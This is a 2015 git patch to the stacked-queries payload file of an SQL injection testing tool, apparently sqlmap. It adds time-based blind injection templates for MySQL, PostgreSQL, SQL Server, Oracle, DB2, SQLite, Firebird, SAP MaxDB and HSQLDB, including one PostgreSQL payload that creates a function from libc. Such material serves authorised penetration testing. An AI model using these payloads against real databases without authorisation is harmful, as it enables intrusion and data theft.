From 37ca0a95f14218d3bcf78032f233d76da266418d Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 3 Mar 2015 14:19:36 +0000 Subject: [PATCH] consolidated stacked queries payloads - issue #1169 --- xml/payloads/04_stacked_queries.xml | 408 ++++++++++++++++++++++++++-- 1 file changed, 381 insertions(+), 27 deletions(-) diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml index 3c5a41869..45ce87a9f 100644 --- a/xml/payloads/04_stacked_queries.xml +++ b/xml/payloads/04_stacked_queries.xml @@ -2,6 +2,27 @@ + + MySQL > 5.0.11 stacked queries (SELECT - comment) + 4 + 1 + 1 + 0 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+ + MySQL > 5.0.11 stacked queries (SELECT) 4 @@ -23,15 +44,15 @@ - MySQL > 5.0.11 stacked queries (SELECT - comment) + MySQL > 5.0.11 stacked queries (comment) 4 - 4 + 2 1 0 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + ;SELECT SLEEP([SLEEPTIME]) # @@ -46,14 +67,13 @@ MySQL > 5.0.11 stacked queries 4 - 1 + 3 1 0 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) ;SELECT SLEEP([SLEEPTIME]) - -- @@ -65,7 +85,7 @@ - MySQL < 5.0.12 stacked queries (heavy query) + MySQL < 5.0.12 stacked queries (heavy query - comment) 4 2 2 @@ -74,7 +94,7 @@ ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - -- + # @@ -85,7 +105,26 @@ - PostgreSQL > 8.1 stacked queries + MySQL < 5.0.12 stacked queries (heavy query) + 4 + 4 + 2 + 0 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+ + + + PostgreSQL > 8.1 stacked queries (comment) 4 1 1 @@ -106,7 +145,27 @@ - PostgreSQL stacked queries (heavy query) + PostgreSQL > 8.1 stacked queries + 4 + 4 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + + + + +
+ PostgreSQL + > 8.1 +
+ + + + PostgreSQL stacked queries (heavy query - comment) 4 2 2 @@ -126,9 +185,28 @@ - PostgreSQL < 8.2 stacked queries (Glibc) + PostgreSQL stacked queries (heavy query) 4 - 4 + 5 + 2 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + + + + +
+ PostgreSQL +
+ + + + PostgreSQL < 8.2 stacked queries (Glibc - comment) + 4 + 3 1 0 1 @@ -148,7 +226,28 @@ - Microsoft SQL Server/Sybase stacked queries + PostgreSQL < 8.2 stacked queries (Glibc) + 4 + 5 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + + + + +
+ PostgreSQL + < 8.2 + Linux +
+ + + + Microsoft SQL Server/Sybase stacked queries (comment) 4 1 1 @@ -170,9 +269,30 @@ - Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) + Microsoft SQL Server/Sybase stacked queries 4 - 5 + 4 + 1 + 0 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+ + + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) + 4 + 1 1 0 1 @@ -190,9 +310,28 @@ - Oracle stacked queries (heavy query) + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) 4 - 5 + 4 + 1 + 0 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + + + + +
+ Oracle +
+ + + + Oracle stacked queries (heavy query - comment) + 4 + 2 2 0 1 @@ -209,6 +348,45 @@ + + Oracle stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + + + + +
+ Oracle +
+ + + + Oracle stacked queries (DBMS_LOCK.SLEEP - comment) + 4 + 4 + 1 + 0 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+ + Oracle stacked queries (DBMS_LOCK.SLEEP) 4 @@ -219,6 +397,25 @@ ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+ + + + Oracle stacked queries (USER_LOCK.SLEEP - comment) + 4 + 5 + 1 + 0 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END -- @@ -239,7 +436,6 @@ ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END - -- @@ -250,7 +446,46 @@ - SQLite > 2.0 stacked queries (heavy query) + IBM DB2 stacked queries (heavy query - comment) + 5 + 3 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + -- + + + + +
+ IBM DB2 +
+ + + + IBM DB2 stacked queries (heavy query) + 5 + 5 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + + + + +
+ IBM DB2 +
+ + + + SQLite > 2.0 stacked queries (heavy query - comment) 4 3 2 @@ -271,9 +506,29 @@ - Firebird stacked queries (heavy query) + SQLite > 2.0 stacked queries (heavy query) 4 - 3 + 5 + 2 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+ + + + Firebird stacked queries (heavy query - comment) + 4 + 4 2 0 1 @@ -292,10 +547,69 @@ - HSQLDB >= 1.7.2 stacked queries + Firebird stacked queries (heavy query) 4 - 3 - 1 + 5 + 2 + 0 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + + + + +
+ Firebird + >= 2.0 +
+ + + + SAP MaxDB stacked queries (heavy query - comment) + 5 + 4 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + -- + + + + +
+ SAP MaxDB +
+ + + + SAP MaxDB stacked queries (heavy query) + 5 + 5 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + + + + +
+ SAP MaxDB +
+ + + + HSQLDB >= 1.7.2 stacked queries (heavy query - comment) + 4 + 4 + 2 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -313,10 +627,30 @@ - HSQLDB >= 2.0 stacked queries + HSQLDB >= 1.7.2 stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+ + + + HSQLDB >= 2.0 stacked queries (heavy query - comment) 4 4 - 1 + 2 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -332,6 +666,26 @@ >= 2.0 - + + + HSQLDB >= 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 2.0 +
+ +